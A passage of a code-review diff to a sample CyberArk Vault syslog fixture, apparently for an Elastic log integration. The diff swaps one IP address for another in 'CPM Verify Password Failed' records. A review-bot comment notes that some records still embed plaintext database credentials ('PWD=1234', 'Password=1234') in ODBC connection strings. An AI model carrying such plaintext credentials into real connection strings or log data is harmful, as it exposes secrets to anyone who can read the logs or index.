\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:56:29\n 2021-03-15T16:56:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:01:07\n 2021-03-15T17:01:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:05:47\n 2021-03-15T17:05:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} 
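Review bot: The `DSN` CAProperty in the last record of this hunk still carries a complete ODBC connection string with an embedded credential, `UID=root;PWD=1234`, even though the surrounding records had their addresses sanitized; that record is an unchanged context line, so the commit leaves it as-is. This is a dev-deploy sample, but if the ingest pipeline copies CAProperty values into indexed fields (not visible here), the fixture then establishes a plaintext password landing in the index as expected behaviour. Consider replacing the secret in the sample with a placeholder, e.g. `SERVER=localhost;UID=root;PWD=<redacted>;DATABASE=test`, or pairing the fixture with a pipeline test that asserts the `DSN` value is masked on output. The same consideration applies to any other sample record in this file carrying a `DSN` property, which lies outside this hunk.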
@@ -11,5 +11,5 @@
 <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:33:17\n 2021-03-15T17:33:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:38:27\n 2021-03-15T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:00:07\n 2021-03-15T18:00:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
-<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
